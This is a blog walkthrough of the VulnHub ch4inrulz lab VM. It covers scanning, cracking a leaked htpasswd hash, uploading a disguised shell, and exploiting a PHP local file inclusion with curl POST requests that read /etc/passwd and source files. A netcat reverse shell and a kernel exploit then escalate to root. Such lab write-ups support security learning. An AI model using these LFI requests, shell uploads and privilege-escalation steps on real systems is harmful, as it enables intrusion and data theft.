Monday, October 21, 2019

VulnHub: ch4inrulz Walkthrough

]

First we start off with an nmap scan of the remote host. 

root@ubuntu:~# nmap -sV -sC -O -Pn -T5 192.168.56.106

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-21 11:24 MDT
Nmap scan report for 192.168.56.106
Host is up (0.00042s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.5
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
|   2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
|_  256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: FRANK's Website | Under development
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:0B:EB:F1 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.19 - 2.6.36
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.13 seconds
root@ubuntu:~#

NMAP came back with ports 21,22,80 and 8011 open lets start with port 21. if we connect to the FTP server we see it allows anonymous logins. 

root@ubuntu:~# ftp 192.168.56.106
Connected to 192.168.56.106.
220 (vsFTPd 2.3.5)
Name (192.168.56.106:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> exit
221 Goodbye.
root@ubuntu:~#

We see there is nothing in the directory lets move on to port 80 and see what it has to offer. We first start by running nikto against the remote host. 

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.106
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.106
+ Target Hostname:    192.168.56.106
+ Target Port:        80
+ Start Time:         2019-10-21 11:26:01 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1051931, size: 13516, mtime: Sat Apr 14 07:39:32 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.html.bak
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting.
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2019-10-21 11:26:16 (GMT-6) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program#

Nikto came back with something about Apaches mod_negotiation being enabled and that it could lead to a brute force of files on the remote system. It gives us two file names index.html and index.html.bak. Lets view the site and see what it looks like.

Looks like a blog of some sort. If we try to view index.html.bak we are asked to download it, so we download it and see this in the source. 

<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>

It looks like a login to a protected directory on the server. Lets fire up JohnTheRipper and crack the hash. After a while we cracked the hash and the password is 'frank!!!' now lets login to the development directory.

It is a list of tools here on the server one which is called the 'uploader' if we try to fuzz some directory names out we find the directory to the upload script.

If we try to upload a simple text file we get the following error. 

File is not an image.Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.

So we need a image file to upload lets try appending GIF89; to our shell code and try to upload. When we try to upload we still get an error saying that the file was rejected, so its checking against file extenstions also so we need to upload it as a .gif file. 

File is an image - image/gif.The file sh.gif has been uploaded to my uploads path.

So we succesufully upload a file but we dont know where the uploads path is. after running some directory discovery scripts I decided to move on. Now I decide to use dirb on the remote host and see what directories it can find. 

---- Scanning URL: http://192.168.56.106/ ----
+ http://192.168.56.106/cgi-bin/ (CODE:403|SIZE 290)                                                                                                               
==> DIRECTORY: http://192.168.56.106/css/                                                                                                                                       
+ http://192.168.56.106/development (CODE:401|SIZE:481)                                                                                                                         
==> DIRECTORY: http://192.168.56.106/img/                                                                                                                                       
+ http://192.168.56.106/index (CODE:200|SIZE:334)                                                                                                                               
+ http://192.168.56.106/index.html (CODE:200|SIZE:13516)                                                                                                                        
==> DIRECTORY: http://192.168.56.106/js/                                                                                                                                        
+ http://192.168.56.106/LICENSE (CODE:200|SIZE:1093)                                                                                                                            
+ http://192.168.56.106/robots (CODE:200|SIZE:21)                                                                                                                               
+ http://192.168.56.106/robots.txt (CODE:200|SIZE:21)                                                                                                                           
+ http://192.168.56.106/server-status (CODE:403|SIZE:295)                                                                                                                       
==> DIRECTORY: http://192.168.56.106/vendor/

dirb didnt come back with anything interesting so lets move on to using WFUZZ and see if it finds anything worth while. I used wfuzz but didnt find anything intresting so lets move on to port 8011. We start again by running nikto against the remote host. 

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.106:8011
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.106
+ Target Hostname:    192.168.56.106
+ Target Port:        8011
+ Start Time:         2019-10-21 12:00:47 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1052109, size: 30, mtime: Sat Apr 14 06:00:08 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7948 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2019-10-21 12:01:00 (GMT-6) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program#

Nikto didnt have anything intresting come back, now lets try dirb and see what it finds. 

==> DIRECTORY: http://192.168.56.106:8011/api/

Dirb found a directory api which looks promising, lets navigate to it and see what it says.

Out of the four files listed, only one (files_api.php) is present on the server. Is we navigate to the file we see this:

It says "No parameter called file passed to me" so lets try and pass the file parameter to the script and see what happens.

We have been detected! After playing around with this for a while I came to the conclusion that this wants a POST request instead of a GET request. We can acomplish this by using curl. 

root@ubuntu:~# curl -X POST -d "file=/etc/passwd" http://192.168.56.106:8011/api/files_api.php

root:x:0:0:root:/root:/bin/bash
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false

root@ubuntu:~#

We see from the output from /etc/passwd that there is one user on the system (frank) and nothing else too intresting. One thing you can do with LFI and PHP is use filters to include files and read their source code which is encoded is base64. If we include the current file we see this: 

curl -X POST -d "file=php://filter/convert.base64-encode/resource=files_api.php" http://192.168.56.106:8011/api/files_api.php
$file = $_POST['file'];
include($file);
$get_file = $_GET['file'];

if(isset($get_file)){

echo "********* HACKER DETECTED *********";
echo "
YOUR IP IS : ".$_SERVER['REMOTE_ADDR'];
echo "
WRONG INPUT !!
";
break;
}


if(!isset($file)){

echo "
No parameter called file passed to me
";
echo "
* Note : this API don't use json , so send the file name in raw format
";

}

/** else{
echo strcmp($file,"/etc/passwd");
echo strlen($file);
echo strlen("/etc/passwd");
if($file == "/etc/passwd"){
        "HACKER DETECTED ..";
        }
}**/

We see the php script is a classic example of local file inclusion. If you remember we uploaded a shell to the server but did'nt know the upload directory. We can try and include the file which will give us a shell on the box when it is included. 

curl -X POST -d "file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php" http://192.168.56.106:8011/api/files_api.php

$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);

We found the upload directory lets visit the website and see if we can directory browse.

We see our shell we uploaded. Now our next task is to start a netcat listener on our kali box and the include the file in the LFI we found in api_files.php. 

root@kali:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.56.106: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.106] 55539
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
 08:02:47 up  3:39,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$

We dropped to a system shell now its time to go searching around the box to see what we can find. 

$ cd /home
$ ls
frank
$ cd frank
$ ls -la
total 36
drwxr-xr-x 3 frank frank 4096 Apr 14  2018 .
drwxr-xr-x 3 root  root  4096 Apr 13  2018 ..
-rw------- 1 frank frank   26 Jul 31  2018 .bash_history
-rw-r--r-- 1 frank frank  220 Apr 13  2018 .bash_logout
-rw-r--r-- 1 frank frank 3353 Apr 13  2018 .bashrc
drwxr-xr-x 2 frank frank 4096 Apr 13  2018 .cache
-rw-r--r-- 1 frank frank  675 Apr 13  2018 .profile
-rw-r--r-- 1 frank frank    0 Apr 13  2018 .sudo_as_admin_successful
-rw-r--r-- 1 frank frank   29 Apr 14  2018 PE.txt
-rw-r--r-- 1 frank frank   33 Apr 14  2018 user.txt
$

We find two interesting file in franks home directory but nothing else. 

www-data@ubuntu:/home/frank$ cat user.txt
cat user.txt
4795aa2a9be22fac10e1c25794e75c1b
www-data@ubuntu:/home/frank$ cat PE.txt
cat PE.txt
Try it as fast as you can ;)
www-data@ubuntu:/home/frank$

After doing some research it turns out the kernel is vulnerable to a local root exploit in searchspliot I compile the exploit and wget it to the box from my kali box. 

www-data@ubuntu:/tmp$ ./15023
./15023
resolved symbol commit_creds to 0xffffffff810852b0
resolved symbol prepare_kernel_cred to 0xffffffff81085780
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
#
# cd /root
cd /root
# ls -la
ls -la
total 32
drwx------  4 root root 4096 Apr 14  2018 .
drwxr-xr-x 22 root root 4096 Apr 13  2018 ..
drwx------  2 root root 4096 Apr 13  2018 .aptitude
-rw-------  1 root root   82 Jul 31  2018 .bash_history
-rw-r--r--  1 root root 3106 Apr 23  2010 .bashrc
drwxr-xr-x  2 root root 4096 Apr 14  2018 .cache
-rw-r--r--  1 root root  140 Apr 23  2010 .profile
-rw-r--r--  1 root root   33 Apr 14  2018 root.txt
# cat root.txt
cat root.txt
8f420533b79076cc99e9f95a1a4e5568
#
That was a fun VM to go through.
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Metasploitable II: Samba Shares
    Lets first start off with an nmap scan of the remote host. root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101 Starting Nmap 7.60 ( ht...
  • DVWA: File Upload
    Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host. We start off with the security b...
  • bWAPP XSS Injections
    Cross-site-Scripting - Reflected (GET) Payload: <script>alert(1)</script> Cross-site-Scripting - Reflected (POST) Payload:...
  • bWAPP CSRF
    CSRF (Change Password) The first challenge is the change password CSRF. Our goal is to successfully change the users password with out log...
  • bWAPP Remote & Local File Inclusion (RFI/LFI)
    In bWAPP There is a module for RFI and LFI injections. Our goal is to exploit these vulnerabilities and get local access to the remote mac...